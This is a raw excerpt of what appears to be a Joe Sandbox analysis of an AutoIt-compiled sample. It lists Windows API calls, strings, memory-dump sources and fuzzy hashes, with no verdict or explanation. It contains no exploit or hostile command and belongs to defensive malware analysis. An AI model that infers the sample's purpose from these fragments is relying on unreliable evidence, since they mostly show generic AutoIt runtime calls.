                                                                                                      • DeleteObject.GDI32(?), ref: 00DA7F34
                                                                                                      • SetTextColor.GDI32(?,?), ref: 00DA7F3A
                                                                                                      • SetBkColor.GDI32(?,?), ref: 00DA7F44
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                      • String ID:
                                                                                                      • API String ID: 1996641542-0
                                                                                                      • Opcode ID: 72fe1f2a388b111b86b4d911bb1505f52ccd56382bb41f8e717552a7a5e31960
                                                                                                      • Instruction ID: 32d61a98871302081aaaf8c49be41ba442ba3dd74cfadb0bf3f1aec8f262fc0f
                                                                                                      • Opcode Fuzzy Hash: 72fe1f2a388b111b86b4d911bb1505f52ccd56382bb41f8e717552a7a5e31960
                                                                                                      • Instruction Fuzzy Hash: 2B612E71D00219AFDF119FA4DC49EEEBBBAEF0A320F154115F916EB2A0D7719940CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32(?), ref: 00DA1A87
                                                                                                      • GetDesktopWindow.USER32 ref: 00DA1A9C
                                                                                                      • GetWindowRect.USER32(00000000), ref: 00DA1AA3
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA1AF8
                                                                                                      • DestroyWindow.USER32(?), ref: 00DA1B18
                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00DA1B4C
                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DA1B6A
                                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DA1B7C
                                                                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00DA1B91
                                                                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00DA1BA4
                                                                                                      • IsWindowVisible.USER32(00000000), ref: 00DA1C00
                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00DA1C1B
                                                                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00DA1C2F
                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00DA1C47
                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00DA1C6D
                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00DA1C87
                                                                                                      • CopyRect.USER32(?,?), ref: 00DA1C9E
                                                                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00DA1D09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                      • API String ID: 698492251-4156429822
                                                                                                      • Opcode ID: cc209967a803d7c117831490e829c7b5abf15206636321310882311987536f77
                                                                                                      • Instruction ID: 80f6a13cd123ad84fc112f61c2c0e57fa55fdb1725f98c77196a07433238bede
                                                                                                      • Opcode Fuzzy Hash: cc209967a803d7c117831490e829c7b5abf15206636321310882311987536f77
                                                                                                      • Instruction Fuzzy Hash: B0B19B75604300AFD704DF64D884B9ABBE5FF85350F04891CF99A9B2A1DB30E845CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D1259A
                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00D125A2
                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00D125CD
                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00D125D5
                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00D125FA
                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00D12617
                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00D12627
                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00D1265A
                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00D1266E
                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00D1268C
                                                                                                      • GetStockObject.GDI32(00000011), ref: 00D126A8
                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00D126B3
                                                                                                        • Part of subcall function 00D119CD: GetCursorPos.USER32(?), ref: 00D119E1
                                                                                                        • Part of subcall function 00D119CD: ScreenToClient.USER32(00000000,?), ref: 00D119FE
                                                                                                        • Part of subcall function 00D119CD: GetAsyncKeyState.USER32(00000001), ref: 00D11A23
                                                                                                        • Part of subcall function 00D119CD: GetAsyncKeyState.USER32(00000002), ref: 00D11A3D
                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00D1199C), ref: 00D126DA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                      • API String ID: 1458621304-248962490
                                                                                                      • Opcode ID: a1ddb5da1ec1a6104c2463f93e6d532494dcccea1f5dbe32ec891decd735711c
                                                                                                      • Instruction ID: a2d84fa02d49182969412648224a7485f612d14514a4aff0bee83eb2df91fd16
                                                                                                      • Opcode Fuzzy Hash: a1ddb5da1ec1a6104c2463f93e6d532494dcccea1f5dbe32ec891decd735711c
                                                                                                      • Instruction Fuzzy Hash: 11B16875A00209AFDB14DFA8DC85BAE7BA6EB49315F104219FE16EB290DB70D940CF61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D71989: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D719A4
                                                                                                        • Part of subcall function 00D71989: GetLastError.KERNEL32(?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719B0
                                                                                                        • Part of subcall function 00D71989: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719BF
                                                                                                        • Part of subcall function 00D71989: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719C6
                                                                                                        • Part of subcall function 00D71989: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D719DD
                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D71685
                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D716B9
                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D716D0
                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00D7170A
                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D71726
                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00D7173D
                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00D71745
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00D7174C
                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D7176D
                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00D71774
                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D717A3
                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D717C5
                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D717D7
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D717FE
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D71805
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D7180E
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D71815
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D7181E
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D71825
                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00D71831
                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00D71838
                                                                                                        • Part of subcall function 00D71A23: GetProcessHeap.KERNEL32(00000008,00D71441,?,00000000,?,00D71441,?), ref: 00D71A31
                                                                                                        • Part of subcall function 00D71A23: HeapAlloc.KERNEL32(00000000,?,00000000,?,00D71441,?), ref: 00D71A38
                                                                                                        • Part of subcall function 00D71A23: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00D71441,?), ref: 00D71A47
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 4175595110-0
                                                                                                      • Opcode ID: e3b4a1a7bf18b8a0c67f9dbc1846fd9374826fbc2c8556da9a30fadccaff8864
                                                                                                      • Instruction ID: 74543e5860a3a3153f0040a209a9112376c26de5192f1d601df7576343f6afbf
                                                                                                      • Opcode Fuzzy Hash: e3b4a1a7bf18b8a0c67f9dbc1846fd9374826fbc2c8556da9a30fadccaff8864
                                                                                                      • Instruction Fuzzy Hash: 95715CB6900209EBDF109FA8DC45FEEBBB9FF05711F188219E919E6290E7719905CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D9CE1C
                                                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00DADCD0,00000000,?,00000000,?,?), ref: 00D9CEA3
                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00D9CF03
                                                                                                      • _wcslen.LIBCMT ref: 00D9CF53
                                                                                                      • _wcslen.LIBCMT ref: 00D9CFCE
                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00D9D011
                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00D9D120
                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00D9D1AC
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00D9D1E0
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00D9D1ED
                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00D9D2BF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                      • API String ID: 9721498-966354055
                                                                                                      • Opcode ID: b41a290a01aeda5397d018e7110e1b05123f36edd39fdf0f8cf3dcdca8d217a1
                                                                                                      • Instruction ID: f10ff2c0a7b0ad5d70e77c88f2e4a1fe16c99c62871d65dda2a88a9f7ebce870
                                                                                                      • Opcode Fuzzy Hash: b41a290a01aeda5397d018e7110e1b05123f36edd39fdf0f8cf3dcdca8d217a1
                                                                                                      • Instruction Fuzzy Hash: E6124C35604301AFDB14DF14D881A6ABBE6FF48754F18845DF89A9B3A2CB31ED41CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00DA1325
                                                                                                      • _wcslen.LIBCMT ref: 00DA1360
                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DA13B3
                                                                                                      • _wcslen.LIBCMT ref: 00DA13E9
                                                                                                      • _wcslen.LIBCMT ref: 00DA1465
                                                                                                      • _wcslen.LIBCMT ref: 00DA14E0
                                                                                                        • Part of subcall function 00D2FD60: _wcslen.LIBCMT ref: 00D2FD6B
                                                                                                        • Part of subcall function 00D73478: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00D7348A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                      • API String ID: 1103490817-4258414348
                                                                                                      • Opcode ID: c3452372666a68a8d1a954aa94af63692fc61dd5eae3bac7162e9324616ff909
                                                                                                      • Instruction ID: 07468073c2da4f902389baccce5d39e6814d42ffe353ccec047f99e8f254492b
                                                                                                      • Opcode Fuzzy Hash: c3452372666a68a8d1a954aa94af63692fc61dd5eae3bac7162e9324616ff909
                                                                                                      • Instruction Fuzzy Hash: A1E169396082019FCB14DF29C44086AB7E2FF9A314F18895DF8969B7A1DB31ED45CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                      • API String ID: 1256254125-909552448
                                                                                                      • Opcode ID: fc8211198d04335ea71d1ca5a5629a53370e6ae09bdd6e10b95e56fa64bfcc3f
                                                                                                      • Instruction ID: feaeb32645dc4d1b29ba926419acb17e5083faaea94ced1c4e54b0a028fba2b6
                                                                                                      • Opcode Fuzzy Hash: fc8211198d04335ea71d1ca5a5629a53370e6ae09bdd6e10b95e56fa64bfcc3f
                                                                                                      • Instruction Fuzzy Hash: 5971E132A0012A9BCF209E7CD9405FE33A3EF61758F290529E8559B394EA35ED84C7B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _wcslen.LIBCMT ref: 00DA8CB9
                                                                                                      • _wcslen.LIBCMT ref: 00DA8CCD
                                                                                                      • _wcslen.LIBCMT ref: 00DA8CF0
                                                                                                      • _wcslen.LIBCMT ref: 00DA8D13
                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DA8D51
                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00DA3F79,?), ref: 00DA8DAD
                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DA8DE6
                                                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DA8E29
                                                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DA8E60
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00DA8E6C
                                                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DA8E7C
                                                                                                      • DestroyIcon.USER32(?), ref: 00DA8E8B
                                                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DA8EA8
                                                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DA8EB4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                      • String ID: .dll$.exe$.icl
                                                                                                      • API String ID: 799131459-1154884017
                                                                                                      • Opcode ID: 47c31d1ee7a70d3575bfab2c5b3c1c2a6eb4f00609387fe177e95b44334fc883
                                                                                                      • Instruction ID: af015beff43327aa3d31b57aee2bd6819dade4aa31976aa2f2d6a071fe26e5a3
                                                                                                      • Opcode Fuzzy Hash: 47c31d1ee7a70d3575bfab2c5b3c1c2a6eb4f00609387fe177e95b44334fc883
                                                                                                      • Instruction Fuzzy Hash: F761AB71A00215FEEB149F64DC41BBE77A8EF0A710F144506FD16D61D0DBB9AA80EBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                      • API String ID: 0-1645009161
                                                                                                      • Opcode ID: ce02bde4de99372d1368a734ce3afa86a77949b183e996c96d6693cce629a83e
                                                                                                      • Instruction ID: e712605ff4def2d83fa8ed802a9108a2d2c09cd16794e77339c983ec538a62f4
                                                                                                      • Opcode Fuzzy Hash: ce02bde4de99372d1368a734ce3afa86a77949b183e996c96d6693cce629a83e
                                                                                                      • Instruction Fuzzy Hash: AF81C171A40306BBDB11AF64EC52FEB7BA8EF15704F044011FD05AA196EB70DA89C7B2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00D84852
                                                                                                      • _wcslen.LIBCMT ref: 00D8485D
                                                                                                      • _wcslen.LIBCMT ref: 00D848B4
                                                                                                      • _wcslen.LIBCMT ref: 00D848F2
                                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00D84930
                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D84978
                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D849B3
                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D849E1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                      • API String ID: 1839972693-4113822522
                                                                                                      • Opcode ID: 2af3f6663c3c5ee8cf18b36b319fa1a668fd9e31171735ee9aabad338919f5a4
                                                                                                      • Instruction ID: 80b73d268b09a8260069787024e248130944951706a081ade1b94d9f8891b10b
                                                                                                      • Opcode Fuzzy Hash: 2af3f6663c3c5ee8cf18b36b319fa1a668fd9e31171735ee9aabad338919f5a4
                                                                                                      • Instruction Fuzzy Hash: 3271B2325083129FC710EF28D8809ABB7E5EF94758F04496DF89697261EB34DD85CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadIconW.USER32(00000063), ref: 00D762BD
                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D762CF
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00D762E6
                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00D762FB
                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00D76301
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00D76311
                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00D76317
                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D76338
                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D76352
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00D7635B
                                                                                                      • _wcslen.LIBCMT ref: 00D763C2
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00D763FE
                                                                                                      • GetDesktopWindow.USER32 ref: 00D76404
                                                                                                      • GetWindowRect.USER32(00000000), ref: 00D7640B
                                                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00D76462
                                                                                                      • GetClientRect.USER32(?,?), ref: 00D7646F
                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00D76494
                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D764BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
